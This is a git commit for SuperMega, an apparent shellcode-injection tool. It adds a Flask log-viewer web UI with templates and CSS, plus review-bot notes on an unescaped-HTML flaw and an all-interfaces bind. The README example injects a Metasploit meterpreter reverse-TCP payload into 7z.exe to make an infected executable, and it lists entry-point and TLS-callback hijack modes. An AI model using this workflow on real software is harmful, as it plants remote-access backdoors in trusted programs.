feature: web server

This commit is contained in:
Dobin
2024-02-17 11:17:40 +00:00
parent fd9dc68eea
commit c215ae62f3
14 changed files with 3592 additions and 1 deletions
+47
@@ -39,6 +39,53 @@ Plugins:
* APPEND
## Examples
### Metasploit in 7z
Inject metasploit into 7z.exe. It will use PEB_WALK.
```
PS C:\repos\supermega> python.exe .\supermega.py --shellcode .\shellcodes\msf-meterpreter-reversetcp.bin --inject .\exes\7z.exe
(supermega.py) Super Mega
(helper.py ) --[ Remove old files ]
(model.py ) --( Capabilities:
(model.py ) 0x0: GetEnvironmentVariableW (b'')
(model.py ) 0x460090: VirtualAlloc (b'')
(supermega.py) --[ SourceStyle: peb_walk
(compiler.py ) --[ C to ASM: build\main.c -> build\main.asm ]
(compiler.py ) ---[ Make ASM from C: build\main.c ]
(compiler.py ) ---[ Fixup : build\main.asm ]
(compiler.py ) > Replace external reference at line: 8
(compiler.py ) > Replace external reference at line: 395
(compiler.py ) > Replace payload length at line: 389
(compiler.py ) > Add end of code label at line: 807
(compiler.py ) ---[ Cleanup: build\main.asm ]
(assembler.py) --[ Assemble to exe: build\main.asm -> build\main.exe -> build\main.bin ]
(assembler.py) ---[ Assemble ASM to EXE: build\main.asm -> build\main.exe ]
(assembler.py) ---[ EXE to SHC: build\main.exe -> build\main.bin ]
(helper.py ) --[ Code section: .text
(helper.py ) > 0x1000 Code Size: 2557 (raw code section size: 2560)
(assembler.py) --[ Merge stager: build\main.bin + .\shellcodes\msf-meterpreter-reversetcp.bin -> build\main.bin ]
(assembler.py) ---[ Size: Stager: 2557 and Payload: 449 Sum: 3006 ]
(injector.py ) --[ Injecting: build\main.bin into: .\exes\7z.exe -> .\exes\7z.infected.exe ]
(supermega.py) --[ Start infected exe ]
```
## rbmode
```
save,run
| |
| +---------- 1 - change AddressOfEntryPoint
| 2 - hijack branching instruction at Original Entry Point (jmp, call, ...)
| 3 - setup TLS callback
| 4 - hijack branching instruction at DLL Exported function (use -e to specify export to hook)
|
+-------------- 1 - store shellcode in the middle of a code section
2 - append shellcode to the PE file in a new PE section
```
## Directories
* `shellcodes/`: Input: Shellcodes we want to use as input (payload)
+1103
+2078
+7
+75
@@ -0,0 +1,75 @@
pre { line-height: 125%; }
td.linenos .normal { color: inherit; background-color: transparent; padding-left: 5px; padding-right: 5px; }
span.linenos { color: inherit; background-color: transparent; padding-left: 5px; padding-right: 5px; }
td.linenos .special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; }
span.linenos.special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; }
.highlight .hll { background-color: #ffffcc }
.highlight { background: #f8f8f8; }
.highlight .c { color: #3D7B7B; font-style: italic } /* Comment */
.highlight .err { border: 1px solid #FF0000 } /* Error */
.highlight .k { color: #008000; font-weight: bold } /* Keyword */
.highlight .o { color: #666666 } /* Operator */
.highlight .ch { color: #3D7B7B; font-style: italic } /* Comment.Hashbang */
.highlight .cm { color: #3D7B7B; font-style: italic } /* Comment.Multiline */
.highlight .cp { color: #9C6500 } /* Comment.Preproc */
.highlight .cpf { color: #3D7B7B; font-style: italic } /* Comment.PreprocFile */
.highlight .c1 { color: #3D7B7B; font-style: italic } /* Comment.Single */
.highlight .cs { color: #3D7B7B; font-style: italic } /* Comment.Special */
.highlight .gd { color: #A00000 } /* Generic.Deleted */
.highlight .ge { font-style: italic } /* Generic.Emph */
.highlight .ges { font-weight: bold; font-style: italic } /* Generic.EmphStrong */
.highlight .gr { color: #E40000 } /* Generic.Error */
.highlight .gh { color: #000080; font-weight: bold } /* Generic.Heading */
.highlight .gi { color: #008400 } /* Generic.Inserted */
.highlight .go { color: #717171 } /* Generic.Output */
.highlight .gp { color: #000080; font-weight: bold } /* Generic.Prompt */
.highlight .gs { font-weight: bold } /* Generic.Strong */
.highlight .gu { color: #800080; font-weight: bold } /* Generic.Subheading */
.highlight .gt { color: #0044DD } /* Generic.Traceback */
.highlight .kc { color: #008000; font-weight: bold } /* Keyword.Constant */
.highlight .kd { color: #008000; font-weight: bold } /* Keyword.Declaration */
.highlight .kn { color: #008000; font-weight: bold } /* Keyword.Namespace */
.highlight .kp { color: #008000 } /* Keyword.Pseudo */
.highlight .kr { color: #008000; font-weight: bold } /* Keyword.Reserved */
.highlight .kt { color: #B00040 } /* Keyword.Type */
.highlight .m { color: #666666 } /* Literal.Number */
.highlight .s { color: #BA2121 } /* Literal.String */
.highlight .na { color: #687822 } /* Name.Attribute */
.highlight .nb { color: #008000 } /* Name.Builtin */
.highlight .nc { color: #0000FF; font-weight: bold } /* Name.Class */
.highlight .no { color: #880000 } /* Name.Constant */
.highlight .nd { color: #AA22FF } /* Name.Decorator */
.highlight .ni { color: #717171; font-weight: bold } /* Name.Entity */
.highlight .ne { color: #CB3F38; font-weight: bold } /* Name.Exception */
.highlight .nf { color: #0000FF } /* Name.Function */
.highlight .nl { color: #767600 } /* Name.Label */
.highlight .nn { color: #0000FF; font-weight: bold } /* Name.Namespace */
.highlight .nt { color: #008000; font-weight: bold } /* Name.Tag */
.highlight .nv { color: #19177C } /* Name.Variable */
.highlight .ow { color: #AA22FF; font-weight: bold } /* Operator.Word */
.highlight .w { color: #bbbbbb } /* Text.Whitespace */
.highlight .mb { color: #666666 } /* Literal.Number.Bin */
.highlight .mf { color: #666666 } /* Literal.Number.Float */
.highlight .mh { color: #666666 } /* Literal.Number.Hex */
.highlight .mi { color: #666666 } /* Literal.Number.Integer */
.highlight .mo { color: #666666 } /* Literal.Number.Oct */
.highlight .sa { color: #BA2121 } /* Literal.String.Affix */
.highlight .sb { color: #BA2121 } /* Literal.String.Backtick */
.highlight .sc { color: #BA2121 } /* Literal.String.Char */
.highlight .dl { color: #BA2121 } /* Literal.String.Delimiter */
.highlight .sd { color: #BA2121; font-style: italic } /* Literal.String.Doc */
.highlight .s2 { color: #BA2121 } /* Literal.String.Double */
.highlight .se { color: #AA5D1F; font-weight: bold } /* Literal.String.Escape */
.highlight .sh { color: #BA2121 } /* Literal.String.Heredoc */
.highlight .si { color: #A45A77; font-weight: bold } /* Literal.String.Interpol */
.highlight .sx { color: #008000 } /* Literal.String.Other */
.highlight .sr { color: #A45A77 } /* Literal.String.Regex */
.highlight .s1 { color: #BA2121 } /* Literal.String.Single */
.highlight .ss { color: #19177C } /* Literal.String.Symbol */
.highlight .bp { color: #008000 } /* Name.Builtin.Pseudo */
.highlight .fm { color: #0000FF } /* Name.Function.Magic */
.highlight .vc { color: #19177C } /* Name.Variable.Class */
.highlight .vg { color: #19177C } /* Name.Variable.Global */
.highlight .vi { color: #19177C } /* Name.Variable.Instance */
.highlight .vm { color: #19177C } /* Name.Variable.Magic */
.highlight .il { color: #666666 } /* Literal.Number.Integer.Long */
+66
@@ -0,0 +1,66 @@
.tablevert td {
border-left: 1px solid rgb(209, 208, 208);
border-right: 1px solid rgb(209, 208, 208);
text-align: center;
}
table.table th {
white-space: nowrap;
}
table.table td {
white-space: nowrap;
}
.fgrey {
color: #b6b6b6;
}
.container {
margin-left: 1em;
margin-right: 1em;
}
.mycode {
margin-top: 0;
margin-bottom: 0;
}
.mycodeline {
display: block;
margin-top: 0;
margin-bottom: 0;
overflow: visible;
font-family: var(--bs-font-monospace);
font-size: 1em;
direction: ltr;
unicode-bidi: bidi-override;
font-family: monospace;
white-space: pre;
}
.indent {
margin-top: 1em;
margin-left: 1em;
}
.matchesview {
padding-left: 4px !important;
padding-right: 4px !important;
}
/* button to the left
https://stackoverflow.com/questions/69833687/how-to-left-align-default-bootstrap-5-accordion-icon
*/
.accordion-button:after {
order: -1;
margin-left: 0;
margin-right:0.5em;
}
.tooltip-inner {
max-width: 40em;
width: 40em;
text-align: left;
}
+9
@@ -0,0 +1,9 @@
<title>SuperMega</title>
<link href="/static/bootstrap.min.css" rel="stylesheet">
<script src="/static/bootstrap.bundle.min.js"></script>
<link rel="stylesheet" href="/static/bootstrap-icons.css">
<link href="/static/styles.css" rel="stylesheet"></link>
<link href="/static/ansi.css" rel="stylesheet"></link>
<link href="/static/pygments-styles.css" rel="stylesheet"></link>
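Review bot: The `</link>` end tags on the three stylesheet lines (styles.css, ansi.css, pygments-styles.css) are invalid markup — `link` is a void element, so browsers ignore the closing tag and validators flag it; drop them so the lines match the bootstrap.min.css line above, e.g. `<link href="/static/styles.css" rel="stylesheet">`. The head also has no `<meta charset="utf-8">`, so the encoding of the pygments output injected by project.html depends on whatever the server sends in Content-Type; adding the meta tag makes it explicit.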
+15
@@ -0,0 +1,15 @@
<!DOCTYPE html>
<html>
<head>
{% include 'header.html' %}
</head>
<body>
{% include 'navigation.html' %}
<div class="indent">
<h1> SuperMega </h1>
</div>
</body>
</html>
+22
@@ -0,0 +1,22 @@
<nav class="navbar navbar-expand-lg navbar-dark bg-dark">
<div class="container">
<a class="navbar-brand" href="#!">SuperMega</a>
<button class="navbar-toggler"
type="button"
data-bs-toggle="collapse"
data-bs-target="#navbarSupportedContent"
aria-controls="navbarSupportedContent"
aria-expanded="false"
aria-label="Toggle navigation"
>
<span class="navbar-toggler-icon"></span>
</button>
<div class="collapse navbar-collapse" id="navbarSupportedContent">
<ul class="navbar-nav mr-auto">
<li class="nav-item"><a class="nav-link {{ 'active' if request.path == '/' else '' }}" href="/">Home</a></li>
</ul>
</div>
</div>
</nav>
+51
@@ -0,0 +1,51 @@
<!DOCTYPE html>
<html>
<head>
{% include 'header.html' %}
</head>
<body>
{% include 'navigation.html' %}
<div class="container-fluid">
<div class="row">
<div class="col-md-2">
<ul class="nav nav-tabs flex-column" id="myTab" role="tablist">
{% for log_file in log_files %}
<li class="nav-item" role="presentation">
<button
class="nav-link"
id="project-{{log_file['id']}}-tab"
data-bs-toggle="tab"
data-bs-target="#project-{{log_file['id']}}"
type="button"
role="tab"
aria-controls="project-{{log_file['id']}}"
aria-selected="true"
>{{log_file['name']}}</button>
</li>
{% endfor %}
</ul>
</div>
<div class="col-md-10">
<div class="tab-content" id="myTabContent">
{% for log_file in log_files %}
<div
class="tab-pane fade"
id="project-{{log_file['id']}}"
role="tabpanel"
aria-labelledby="project-{{log_file['id']}}-tab"
>
{{log_file['content']|safe}}
</div>
{% endfor %}
</div>
</div>
</div>
</div>
</body>
</html>
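Review bot: `{{log_file['content']|safe}}` on the tab-pane line disables autoescaping for every entry, but in the `/project` route of views.py (same commit) only files whose name contains `main_c` or `_asm` are passed through pygments' `highlight()`; any other `.txt` file under `logs/` reaches this template as raw text and is inserted into the page unescaped, so a log line containing markup is rendered as HTML. The fix belongs in the fallback branch of views.py, either escaping it with the standard library (`else: data = html.escape(data)` plus `import html`) or highlighting it like the other branches (`else: data = highlight(data, TextLexer(), HtmlFormatter(full=False))` with `TextLexer` added to the `pygments.lexers` import), so that every `content` value is HTML by construction before `|safe` is applied. `{{log_file['name']}}` and the `id` attributes stay autoescaped, which is correct.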
+77
@@ -0,0 +1,77 @@
from flask import Blueprint, current_app, flash, request, redirect, url_for, render_template, send_file, make_response, session
from werkzeug.utils import secure_filename
import os
import logging
import io
from typing import List, Tuple
from datetime import date
from pygments import highlight
from pygments.lexers import CLexer, NasmLexer, DiffLexer
from pygments.formatters import HtmlFormatter
import difflib
views = Blueprint('views', __name__)
@views.route("/")
def index():
return render_template('index.html')
@views.route("/project")
def project():
# read the content of all files in logs
log_files = []
id = 0
asm_a = "" # for diff
asm_b = ""
for file in os.listdir("logs"):
if file.endswith(".txt"):
print("Handle: ", file)
with open(os.path.join("logs", file), "r") as f:
data = f.read()
if 'main_c' in file:
data = highlight(data, CLexer(), HtmlFormatter(full=False))
elif '_asm' in file:
# handle special cases
if '_orig' in file:
asm_a = data
if '_cleanup' in file:
asm_b = data
data = highlight(data, NasmLexer(), HtmlFormatter(full=False))
entry = {
"name": file,
"id": str(id),
"content": data,
}
log_files.append(entry)
id += 1
# more
if asm_a != "" and asm_b != "":
# do the diff from the content of the two files
a = asm_a.splitlines()
b = asm_b.splitlines()
diff_generator = difflib.unified_diff(a, b, lineterm='')
diff_string = '\n'.join(diff_generator)
diff_l = highlight(diff_string, DiffLexer(), HtmlFormatter(full=False))
entry = {
"name": "_asm_diff".format(),
"id": str(id),
"content": diff_l,
}
log_files.append(entry)
id += 1
asm_a = ""
asm_b = ""
return render_template('project.html',
log_files=log_files
)
+2 -1
@@ -2,4 +2,5 @@ pytest
pefile
capstone
keystone-engine
jinja2
jinja2
Pygments
+33
@@ -0,0 +1,33 @@
#!/usr/bin/python3
import os
import argparse
from flask import Flask
from app.views import views
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--listenip', type=str, help='IP to listen on', default="0.0.0.0")
parser.add_argument('--listenport', type=int, help='Port to listen on', default=5001)
parser.add_argument('--debug', action='store_true', help='Debug', default=False)
args = parser.parse_args()
root_folder = os.path.dirname(__file__)
app_folder = os.path.join(root_folder, 'app')
app = Flask(__name__,
static_folder=os.path.join(app_folder, 'static'),
template_folder=os.path.join(app_folder, 'templates')
)
#app.config['UPLOAD_FOLDER'] = os.path.join(app_folder, 'upload')
#app.config['EXAMPLE_FOLDER'] = os.path.join(app_folder, 'examples')
app.config['TEMPLATES_AUTO_RELOAD'] = True
app.config['SECRET_KEY'] = os.urandom(24)
app.config['SESSION_TYPE'] = 'filesystem'
app.config.from_prefixed_env()
app.register_blueprint(views)
app.run(host=args.listenip, port=args.listenport, debug=args.debug)
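Review bot: `--listenip` defaults to `"0.0.0.0"` on its `add_argument` line, so the Flask development server binds every interface by default, and together with `--debug` the Werkzeug interactive debugger is then reachable from the network; for a local tool `default="127.0.0.1"` is the safer default, with the all-interfaces bind an explicit opt-in. `app.config['SECRET_KEY'] = os.urandom(24)` is assigned before `app.config.from_prefixed_env()`, so a `FLASK_SECRET_KEY` environment variable overrides it and, absent one, the key changes on every start; a one-line comment such as `# random per-process key unless FLASK_SECRET_KEY is set; sessions do not survive a restart` would make that intentional rather than surprising. `app.run()` is the development server, which is fine for the stated use but worth stating in a module docstring.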